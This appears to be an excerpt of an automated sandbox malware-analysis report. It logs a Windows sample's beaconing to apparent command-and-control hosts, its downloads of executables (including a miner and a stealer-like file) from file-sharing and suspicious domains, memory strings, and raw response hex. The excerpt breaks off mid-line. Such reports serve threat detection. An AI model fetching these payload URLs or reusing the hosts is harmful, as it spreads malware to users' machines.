Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drdewhl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dkguwsr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vhtbqyotg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jcvvj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://djmot.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qnrcg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mgvmcdndjf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: host-data-coin-11.com
Connects to a URL shortener service
Source: C:\Windows\explorer.exe DNS query: name: bit.ly
Source: C:\Windows\explorer.exe DNS query: name: bitly.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.166.28.199 188.166.28.199
Source: Joe Sandbox View IP Address: 54.38.220.85 54.38.220.85
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49788 -> 185.7.214.171:8080
Source: 1E73.exe, 00000013.00000002.411920357.0000000000ADC000.00000004.00000001.sdmp String found in binary or memory: http://file-file-host4.com/sqlite3.dll
Source: svchost.exe, 00000008.00000002.307494459.00000286A4013000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000005.00000002.540229534.0000014E0BA3E000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000005.00000002.540229534.0000014E0BA3E000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: OPH4W4WL.19.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: svchost.exe, 00000005.00000002.540229534.0000014E0BA3E000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: 3161.exe, 00000016.00000002.468965698.0000000003B71000.00000004.00000001.sdmp, 3161.exe, 00000016.00000002.469208214.0000000003CE1000.00000004.00000001.sdmp, 3161.exe, 00000016.00000002.469265641.0000000003D75000.00000004.00000001.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: svchost.exe, 00000008.00000003.306960101.00000286A405F000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000005.00000002.540229534.0000014E0BA3E000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: OPH4W4WL.19.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 00000005.00000002.540229534.0000014E0BA3E000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000008.00000003.306974569.00000286A4049000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.306960101.00000286A405F000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.307538873.00000286A403D000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000008.00000002.307598801.00000286A4069000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.306939084.00000286A4066000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000008.00000003.306960101.00000286A405F000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.306974569.00000286A4049000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.307553789.00000286A404B000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000008.00000003.306960101.00000286A405F000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.307538873.00000286A403D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.306960101.00000286A405F000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000008.00000003.306960101.00000286A405F000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000008.00000003.306960101.00000286A405F000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000008.00000003.307092094.00000286A4040000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.307545121.00000286A4042000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000008.00000003.307092094.00000286A4040000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.307545121.00000286A4042000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000008.00000003.306960101.00000286A405F000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.307092094.00000286A4040000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.307575446.00000286A405C000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: OPH4W4WL.19.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OPH4W4WL.19.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OPH4W4WL.19.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000008.00000003.306974569.00000286A4049000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000002.307575446.00000286A405C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000002.307575446.00000286A405C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000003.306953269.00000286A4062000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000008.00000003.306960101.00000286A405F000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.307538873.00000286A403D000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.284251489.00000286A4031000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: OPH4W4WL.19.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: OPH4W4WL.19.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 00000008.00000002.307538873.00000286A403D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.307494459.00000286A4013000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.307538873.00000286A403D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000003.307076898.00000286A4045000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000003.307076898.00000286A4045000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000003.284251489.00000286A4031000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000008.00000003.307105787.00000286A403A000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.284251489.00000286A4031000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000008.00000003.306974569.00000286A4049000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.307553789.00000286A404B000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: OPH4W4WL.19.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: host-data-coin-11.com
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 19_2_00404BE0
Source: global traffic HTTP traffic detected: GET /attachments/916319571638620172/925647741571452938/Pyroxylic.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /3eHgQQR HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bit.ly
Source: global traffic HTTP traffic detected: GET /a/blocked?hash=3eHgQQR&url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitly.com
Source: global traffic HTTP traffic detected: GET /%28/8V4TRR/q.exe%29.zip HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic HTTP traffic detected: GET /u8txqc HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: short.link
Source: global traffic HTTP traffic detected: GET /dogewallet-setup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: dodecoin.org
Source: global traffic HTTP traffic detected: GET /file123.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: botmaybe11.mcdir.me
Source: global traffic HTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic HTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic HTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
Source: global traffic HTTP traffic detected: GET /tratata.php HTTP/1.1Host: file-file-host4.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqlite3.dll HTTP/1.1Host: file-file-host4.comCache-Control: no-cacheCookie: PHPSESSID=6g3726k5uv4pem6019kjak5c2h
Source: global traffic HTTP traffic detected: GET /files/2264_1640622147_2258.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic HTTP traffic detected: GET /downloads/toolspab1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
Source: global traffic HTTP traffic detected: GET /stlr/maps.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.243.44.128
Source: global traffic HTTP traffic detected: GET /miner/new.exe HTTP/1.1Host: 91.243.44.128Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1e b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef ae 8a 70 bc 57 dd 42 d6 f7 23 8c 21 e6 c3 93 50 2c e2 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9KpWB#!P,c0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 61 74 61 2d 68 6f 73 74 2d 63 6f 69 6e 2d 38 2e 63 6f 6d 20 50 